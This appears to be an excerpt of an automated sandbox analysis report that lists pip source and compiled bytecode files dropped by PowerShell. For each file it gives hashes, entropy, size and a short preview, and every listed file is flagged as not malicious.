                                                                                                    Preview:import functools.import logging.import os.import shutil.import sys.import uuid.import zipfile.from optparse import Values.from pathlib import Path.from typing import Any, Collection, Dict, Iterable, List, Optional, Sequence, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version.from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment, NoOpBuildEnvironment.from pip._internal.exceptions import InstallationError, PreviousBuildDirError.from pip._internal.locations import get_scheme.from pip._internal.metadata import (. BaseDistribution,. get_default_environment,. get_directory_distribution,. get_wheel_distribution,.).from pip._inter
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4704
                                                                                                    Entropy (8bit):4.216083028637518
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:yqtq84IDbgjQvJUjASvpC319hi9uDh4FoN7z+ULtYKP/g23syOygj:dX73g+J2XI319sih20a2d/jlOyU
                                                                                                    MD5:0ADC2DA9F4F72B393701262DF03D5961
                                                                                                    SHA1:49A3ABAB94A935BDC119F167997A24FBF9417B41
                                                                                                    SHA-256:88C603513A12824C45CAB3FF3AB4ED3D2830E1DC234721910E91A8A13A9E0386
                                                                                                    SHA-512:DF5B6A8A61C2CBA426339D5633E81E29CD52C8DA8639D2E72BC0EF99E7AD29AF3597D71852C9BF963F15E7752BE6D3793C8B92BD86ACD74378D1F97BC1F0FD88
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.from collections import OrderedDict.from typing import Dict, List..from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class RequirementSet:. def __init__(self, check_supported_wheels: bool = True) -> None:. """Create a RequirementSet.""".. self.requirements: Dict[str, InstallRequirement] = OrderedDict(). self.check_supported_wheels = check_supported_wheels.. self.unnamed_requirements: List[InstallRequirement] = [].. def __str__(self) -> str:. requirements = sorted(. (req for req in self.requirements.values() if not req.comes_from),. key=lambda req: canonicalize_name(req.name or ""),. ). return " ".join(str(req.req) for
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24551
                                                                                                    Entropy (8bit):4.372446389382628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hd/9msLNLjyO1XZ8RvFuSjEiRMFfiGf0zdTjtAttm5QqglW:hd0sLpTGjECWqGf01jattm57glW
                                                                                                    MD5:17F5E081F34812C1B3BDFCCAB3FBE0E7
                                                                                                    SHA1:E3549EC01B2680F073048E2198EEBA53FAA5EEA5
                                                                                                    SHA-256:9E6BD341A4420B48AEFB94F0D1D8E55C98528FA5A6A8746F4F7AA4904742DF91
                                                                                                    SHA-512:A7414A1007A7845891F0C7CD6E5489CBB37BDF8F7BF72E8E0D2A7C788C4884D392A70C0DE121319C8A1F6E04996C3EC8E47ADAF27370D99D004A8D583688A5AD
                                                                                                    Malicious:false
                                                                                                    Preview:import functools.import os.import sys.import sysconfig.from importlib.util import cache_from_source.from typing import Any, Callable, Dict, Generator, Iterable, List, Optional, Set, Tuple..from pip._internal.exceptions import UninstallationError.from pip._internal.locations import get_bin_prefix, get_bin_user.from pip._internal.metadata import BaseDistribution.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.logging import getLogger, indent_log.from pip._internal.utils.misc import ask, normalize_path, renames, rmtree.from pip._internal.utils.temp_dir import AdjacentTempDirectory, TempDirectory.from pip._internal.utils.virtualenv import running_under_virtualenv..logger = getLogger(__name__)...def _script_names(. bin_dir: str, script_name: str, is_gui: bool.) -> Generator[str, None, None]:. """Create the fully qualified name of the files created by. {console,gui}_scripts for the given ``d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):4.783028185348878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/Vne75jDn23d6oAreKAyECP6Iaatgem/l:T0tVe7ZSImbcPjaatHmt
                                                                                                    MD5:4A2E3680249665CDB95C54F9DE7E84CD
                                                                                                    SHA1:B3B9B7E5CA41A2D981CA78FF53D6DDC2AE7178D7
                                                                                                    SHA-256:C483348B83C56233161BAD4A82CA53EC19C7DF3AEDDA1E4BD449C647688AA4A1
                                                                                                    SHA-512:30642E4F3E5613F10F6D54A823AF7CCF38DB445234D34CDF67776C0018796EDEFBBBAC15608F6CFC205B5554F958315F6B932030696C30C6F7662D6EDE18553D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1194
                                                                                                    Entropy (8bit):5.267534912765226
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fngE2mUXesnxgrqjO3YS6egO5lV3JElqbHFhs2DplJOn3EVuYf54hQ:oEjUXhBjOgOzbEefvd7lVuY4Q
                                                                                                    MD5:BA79ADF1DF67E10B2C0A9AE070F792DD
                                                                                                    SHA1:73B9D3054600ACEEDF39220B25FB3F83DF8EA886
                                                                                                    SHA-256:3107CA1285BB0242F7B44EA311B148D2F0E7EC3972738E0766DF4A2A391A30FE
                                                                                                    SHA-512:5370B58809EADC9006122DA56FF3AAC0585A1C4D1742DA73AD6302D4E433DF3DD568A816E222E8CA4729A962CA7D90EFBE47154CB3DA4C13944089AF32F4A739
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfG.........................\.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.....g.e.f.....Z...G.d...d.........Z.y.)......)...Callable..List..Optional)...InstallRequirement)...RequirementSetc.....................<.....e.Z.d.Z.d.e.e.....d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...BaseResolver..root_reqs..check_supported_wheels..returnc...........................t.....................N....NotImplementedError)...selfr....r....s.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/base.py..resolvez.BaseResolver.resolve..............."..#..#.......req_setc...........................t...................r....r....).r....r....s.... r......get_installation_orderz#BaseResolver.get_installation_order....r....r....N)...__name__..__module__..__qualname__r....r......boolr....r....r......r....r....r....r........s@.........$.....0..1....$.KO....$.......$....$..%....$..... ..!....$r....r....N)...typingr....r....r......pip._interna
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):583
                                                                                                    Entropy (8bit):4.579538678497288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:1REYB1/qMDgYSYqMWKiQFi3RHWkuGn4U4jSXxTZ2cfnU6ZKo7CGN2yQfny:1REq/cYIU8RHvuG4UCSXBZ2cPOCN25Py
                                                                                                    MD5:BBFA436B355A45AA3393C1E1AC9033F2
                                                                                                    SHA1:BB0A50E2866D29BB4C616CF2900FA3EB8EED3051
                                                                                                    SHA-256:AA59A1DF6E520557EF1BA31EF6073936C879B1DC07070CC706AE9A117B4AB0B0
                                                                                                    SHA-512:4AFE1CB158E4CA8FA05DE5B664CED2E6F3CA5126CEF3F124DB0A17FF95786FAA21434C11AF603774184264E5AD47D82E621E16FF78DDAF290DB2967331B530DB
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import Callable, List, Optional..from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet..InstallRequirementProvider = Callable[. [str, Optional[InstallRequirement]], InstallRequirement.]...class BaseResolver:. def resolve(. self, root_reqs: List[InstallRequirement], check_supported_wheels: bool. ) -> RequirementSet:. raise NotImplementedError().. def get_installation_order(. self, req_set: RequirementSet. ) -> List[InstallRequirement]:. raise NotImplementedError().
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):213
                                                                                                    Entropy (8bit):4.803469557430526
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/VneSn23d6oAreKAyECGQ6Iaatgem/l:T0tVerImbcGQjaatHmt
                                                                                                    MD5:B761D83DBC5A8E87980B28814E26B5D3
                                                                                                    SHA1:586A8CBB13E40A21F3342A36E4F4E034C197886F
                                                                                                    SHA-256:D7DD5CCC806277F11764C0E5F171149BA757F22B893F0D086C59AA05F18714C9
                                                                                                    SHA-512:401884210E66589F68A4A4EF893DA3837A7E0FF56D6DC140114E5A1D0C664D636D45EC021C5058D4E1EEC68720AD1F55C44527E61F9D68C6AE6CE5D03BE796EB
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/legacy/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22448
                                                                                                    Entropy (8bit):5.431543876548154
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:M4Htag8ghiaXwHN0pv+WPfVriO8TiDMCYK5viGfFitz+myUttVyR:xHtag8gtAtyv+WP9+uZdFitz0UttoR
                                                                                                    MD5:96558E3D4ED583314F72732658D0ED48
                                                                                                    SHA1:E3502A8CA035D279C527C93E09550D74EBF59DED
                                                                                                    SHA-256:FD6D23874C26AC677FC8FF735EA6858559DA6F287D9DF603A1B74FF12E41BC9C
                                                                                                    SHA-512:4623FC246F8AA80E7CF13900F626D8D186C4CFF85362E5C7A9FA49631C5A7B48A4ECE6DF4DDADFE713632DD5276787CEC566D8B6B9FEC38A65F6063E15AF17EF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.].............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..d.d.l6m7Z7..d.d.l8m9Z9....e.jt..................e;........Z<e.e=e.e'....f.....Z>..d.d.e.d.e.e?e?e?f.....d.e@d.d.f.d...ZA..G.d...d.e,........ZBy.) ay...Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)......N)...defaultdict)...chain)...DefaultDict..Iterable..List..Optional..Set..Tuple)...specifiers)...Requirement)...WheelCache).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24025
                                                                                                    Entropy (8bit):4.301715348590666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4RHF/Uag88q0Dd/GZuutMCAK1iG/yNbdwXMm5QUl0:+lUag8/0DdegGRyNbdwcm5Qb
                                                                                                    MD5:9CD40F9B233AE35B269FE58D69CEBCB5
                                                                                                    SHA1:28A0853F100C0B441801B09796CEB2C032FFBC7A
                                                                                                    SHA-256:5E4DB88D0EB61AF2EBE0C73B22337FAA23BCF2AA740489B35663C8173F502CE1
                                                                                                    SHA-512:522A333673276A6101870E195F18D6B29B50F4B51B841DFA33422A77EF60805E0BE76CF3D2E7E611C75660C58ACD11072E6239063DCD041C009DC646B0967D3D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import logging.import sys.from collections import defaultdict.from itertools import chain.from typing import DefaultDict, Iterable, List, Optional, Set, Tuple..from pip._vendor.packaging import specifiers.from pip._vendor.packaging.requirements import Requirement..from pip._internal.cache import WheelCache.from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. HashError,. HashErrors,. InstallationError,. NoneMetadataError,. UnsupportedPythonVersion,.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):217
                                                                                                    Entropy (8bit):4.833915723226737
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/VneWn23d6oAreKAyECOTE6Iaatgem/l:T0tVefImbc8EjaatHmt
                                                                                                    MD5:624CD27ACD598D21B40165371D9B344C
                                                                                                    SHA1:76631A1AECC0D69EFFD0834DEAEFB613C87CB892
                                                                                                    SHA-256:AF3F57E763627DAC683D00E022EE8B4DFB87C44132EE1C739BF80270BAD1BE98
                                                                                                    SHA-512:0E2A43249FC5957048122BF736D78B6B26F30F4FD2689BD72DD6EC65CE4A0C804B8519BD88993EA784A9DB3151964D2DC2166C658DDEEBE0D7D7535882DA5B32
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........xC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8346
                                                                                                    Entropy (8bit):5.131650861481336
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/4kTVWkbAo1Vziyd+O6f3N62MtejbpaWGecYfaQhZ0KYWc:/jWkUo/dy3Mm7GeFfLhe3
                                                                                                    MD5:8A958BD8B8C7C324B1BAD1C0CCA343E6
                                                                                                    SHA1:6CB2304BD5F88FF2C2C0661F4E7D431E210EEF55
                                                                                                    SHA-256:BBB196906A15AFBD049F601529AB3285FB859A18EED7F2720AD5480F4F593665
                                                                                                    SHA-512:EA275493790EC077D67DBFC49C7BED0ABE87DD840BB218E568FF52E36CA6516CA21E5C8C5F32E1D277A4876F602977D3B4B0E44052995E5F9B792E1C519739E7
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf5...............................d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.d.....e.e.....f.....Z.e.e.e.f.....Z.d.e.d.e.e.....d.e.f.d...Z...G.d...d.........Z...G.d...d.........Z.d.e.d.d.d.e.f.d...Z...G.d...d.........Z.y.)......)...FrozenSet..Iterable..Optional..Tuple..Union)...SpecifierSet)...NormalizedName)...LegacyVersion..Version)...Link..links_equivalent)...InstallRequirement)...Hashes..Candidate..project..extras..returnc.....................N.....|.s.|.S.d.j...................t.........|.................}.|...d.|...d...S.).N..,..[..])...join..sorted).r....r......extras_exprs.... .tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/base.py..format_namer........s/.................(.(.6.&.>..*.K....Y.a...}.A..&..&.....c..........................e.Z.d.Z.d.e.d.e.d.e.e.....d.d.f.d...Z.e.d.d...........Z.e.d.e.d.d.f.d...........Z.d.e.f.d...Z.d.e.d.d.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30407
                                                                                                    Entropy (8bit):5.14075482732838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:kBCEJR0v0wf4hOVCycZaMIF5++Ay8kMTB:kkR4hOgZYrFx8Ht
                                                                                                    MD5:CCE7D857153B945B240ACB7F7FFA75E9
                                                                                                    SHA1:659D0B93F010E8D31746874801409558639B08E9
                                                                                                    SHA-256:9E76116F8EA0B0783D07E1197A2B4A7A6BC6C8A4F8B22E29779F4ADB08672F5F
                                                                                                    SHA-512:FBF39A858FB8C07DFCBDF2A0DD04D57A1D8CEC40F087AAD4047617F4B21C9443B60E450816F549AED1A623B9E0D958FFD8242C5902E64F2484A9EFD167BF0FD5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf<R..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(..e.r.d.d.l)m*Z*....e.jV..................e,........Z-e.d.....Z...e.e.d.........Z/d.e%d.e.e.....f.d...Z0d.e.d.e.d.e.f.d...Z1d.e.d.e.d.e.f.d...Z2d.e.d.e.d.e.f.d...Z3..G.d...d.e%........Z4..G.d...d.e4........Z5..G.d...d e4........Z6..G.d!..d"e%........Z7..G.d#..d$e%........Z8..G.d%..d&e%........Z9y.)'.....N)...TYPE_CHECKING..Any..FrozenSet..Iterable..Optional..Tuple..Union..cast)...NormalizedName..canonicalize_name)...Version)...HashError..InstallationSubprocessError..MetadataInconsistent)...BaseDistribution)...Link..links_equivalent)...Wheel)...install_req_from_editable..install_req_from_line)...InstallRequirement)...direct_url_from_link)...normalize_version_info.....)...Candidate..CandidateVersion..Requirement..format_name)...Fa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32123
                                                                                                    Entropy (8bit):5.499697155846887
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Qol4gJlDBsTzD4rvoP/Gn5pkiA6585mhSI99DY:QS1DonQ5pkiz8zIk
                                                                                                    MD5:DD86F7BE9A9145CC97461BB6F8788935
                                                                                                    SHA1:B7CB9122B6CC6C51302F018F8762619DF2F48D4E
                                                                                                    SHA-256:9E413D07884604195FE039D45E6C03400C398C287B5D14829BCD80909220DE21
                                                                                                    SHA-512:88C9A471F09AD42B53A4B9B074FBC8E3C38CD5B03B00FA154DC1823E291B88884916472757C200DAA887C3F748B1603A1AD8732CF721D02C7C53DD7E0C94AE63
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf$~........................R.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>..d.d.l?m@Z@mAZAmBZBmCZC..d.d.lDmEZEmFZFmGZGmHZHmIZImJZJmKZK..d.d.lLmMZMmNZN..d.d.lOmPZPmQZQmRZRmSZSmTZT..e.r.d.d.l.mUZU....G.d...d.eU........ZV..e.j...................eX........ZY..e.d.........ZZe.e*eZf.....Z[..G.d...d.e.........Z\..G.d ..d!........Z]y.)".....N)...TYPE_CHECKING..Dict..FrozenSet..Iterable..Iterator..List..Mapping..NamedTuple..Optional..Sequence..Set..Tuple..TypeVar..cast)...InvalidRequirement)...SpecifierSet)...NormalizedName..canonicalize_name)...ResolutionImpossible)...CacheEntry..WheelCache)...DistributionNotFound..InstallationError..MetadataInconsistent..UnsupportedPythonVersion..Unsupporte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6217
                                                                                                    Entropy (8bit):5.530119785914288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:0zr4lqxqBYYHPpgUa1WM8Z+7vI32Xs3VkeezQkgSgjt+7L7NE987i7Mu7vh7kht8:JH3xoqyvI3lTRkLnNE9uMj9Gv9u
                                                                                                    MD5:F92B8067E3117CBFE4FA49E11324B686
                                                                                                    SHA1:884F850FD51C562F306F305FD2D52E907AA231E0
                                                                                                    SHA-256:ABAAB35333D44BBB951D8A3731A70916D080A573BF136716803D8AD27A8B300F
                                                                                                    SHA-512:C303DB57EA06E240F4B119677450ED704EB6FB9C39BAC26274B29386A291D651DFA520EE841E1A623507B53FEA917BF29A73EE6A182929AA6BC99110797456D0
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfI...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.g.e.e.....f.....f.....Z.e.r.e.e.....Z.n.e.Z.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z...G.d...d.e.........Z.y.).a....Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.......N)...Sequence)...TYPE_CHECKING..Any..Callable..Iterator..Optional..Set..Tuple)..._BaseVersion.....)...Candidate..infos..returnc................#....|...K.....t.................}.|.D.])..\...}.}.|.|.v.r.....|.........}.|.....|.......|.j.............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10387
                                                                                                    Entropy (8bit):5.6431964553348735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nDUGNeHLeTUx0E5TJ6yIXxOUyoZmQMW/U8zTdVAhs+RlLq6mPVB5W:nQk2p/gXUoZdLTc4dS
                                                                                                    MD5:5064206C8BAB571147F2D01DA0FC87A3
                                                                                                    SHA1:F4B84356E4880089A44E8D3C86EDF0F16C988869
                                                                                                    SHA-256:72487FDBCBC8EE88039CEEB3FA0D5D1A292229D8CD963D068D07260AC49FAB4F
                                                                                                    SHA-512:BF591DE2FAB00943D9E11C262613B46466911DCEFC8CE0230153DBAD0F620D847497C339D84B53C67CE87BB44EA68323C58370AB2E8917AF60FFEC04BBAFC492
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf`&..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...e.e.e.f.....Z.e.e.e.e.f.....Z.n.e.Z...e.d.........Z...e.d.........Z.d.e.e.e.f.....d.e.d.e.d.e.e.e.f.....f.d...Z...G.d...d.e.........Z.y.)......N)...TYPE_CHECKING..Dict..Iterable..Iterator..Mapping..Sequence..TypeVar..Union)...AbstractProvider.....)...Candidate..Constraint..Requirement)...REQUIRES_PYTHON_IDENTIFIER)...Factory)...Preference)...RequirementInformation..D..V..mapping..identifier..default..returnc.....................X.....|.|.v.r.|.|.....S.|.j...................d.........\...}.}.}.|.r.|.|.v.r.|.|.....S.|.S.).ai...Get item from a package name lookup mapping with a resolver identifier... This extra logic is needed when the target mapping is keyed by package. name, which cannot be directly looked up with an identifier (which may. contain requested extras). Additional logic is added to al
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4944
                                                                                                    Entropy (8bit):5.275930810013513
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JZAc2byCgey8Tl7eodtBzCLs2rhlnpqIkAzqzpybHQioc+Qc:9xePl6od+fsXgwioX
                                                                                                    MD5:D8D985A92DD7F21F6671316CCF21B82A
                                                                                                    SHA1:25E72368B0C2CBDC513C2BEEC204FCC7DDDF0F69
                                                                                                    SHA-256:4E2561BC8AA107545FAE640DD9F7F7F4DB4715BA45ADED1F42FD9C0BF5AC852B
                                                                                                    SHA-512:F6218AC2B43DC6D5291863FB31165DF4F1987D8D0E319D6F73B5ACAA5CDD84FF21A81DE8A9900C806673E5228EA4DD99FC401E0612A00065F5019E2C20674049
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...defaultdict)...getLogger)...Any..DefaultDict)...BaseReporter.....)...Candidate..Requirementc.....................(.....e.Z.d.Z.d.d...Z.d.e.d.e.d.d.f.d...Z.y.)...PipReporter..returnNc.....................B.....t.........t.................|._.........d.d.d.d...|._.........y.).Nz.pip is looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.pip is still looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.This is taking longer than usual. You might need to provide the dependency resolver with stricter constraints to reduce runtime. See https://pip.pypa.io/warnings/backtracking for guidance. If you want to abort this run, press Ctrl + C.).r.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11438
                                                                                                    Entropy (8bit):4.865034867107575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:8zgdpKTt3IUkVkjMm79c69AiXEmDNJdojSj6CcHp+0yRxwraWixUi9zuv/gbkVnY:8cAD9tAON5ToA7nwrgxpIqSVUmQ
                                                                                                    MD5:6A386E8FFE0A9A956545A3053EF0D6FB
                                                                                                    SHA1:E534906E23007A83DEB35666D0C858C888DC6DC8
                                                                                                    SHA-256:CFE74729791FC38C9F2BDE10B3D560DE45F1CE54325D04172C11C255B78E08B8
                                                                                                    SHA-512:616C67A19D7CD55B25D537E31542007FDEB4201D87B525A1F698CA349925BA0C651ADF428328B11357A17F3429CE0BCD09098D6F6E1F5672B50E19247DBF4E85
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf@..............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...SpecifierSet)...NormalizedName..canonicalize_name)...install_req_drop_extras)...InstallRequirement.....)...Candidate..CandidateLookup..Requirement..format_namec..........................e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)...ExplicitRequirement..candidate..returnNc...........................|.|._.........y...N..r........selfr....s.... .|C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/requirements.py..__init__z.ExplicitRequirement.__init__....s........".........c.....................,.....t.........|.j...........................S.r....)...strr......r....s.... r......__str__z.ExplicitRequir
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12360
                                                                                                    Entropy (8bit):5.538903816941455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:UQdzXGFSCGh4QfIdUJ3MbYJbYcliYxGh314LCLpifHCJU1Pf:VLwU4QwCYYxvliYIx1BpifHCJMPf
                                                                                                    MD5:D0DAB0D93EE63E712918DF54221C6D03
                                                                                                    SHA1:C9577E690FE6E9971CD947CA202E3B37089E1D81
                                                                                                    SHA-256:8B4B27925E301711E90136BE4E62BCF537063C68D53AEFCD0AFE9BCA278C8A88
                                                                                                    SHA-512:503454268B5AEDEEEF549D050EB84258CFC8983A529A3996E3F5D8806C92F28037A964635CD04A481A884BD0F73DF3253A36088122457CB326872E7102248053
                                                                                                    Malicious:false
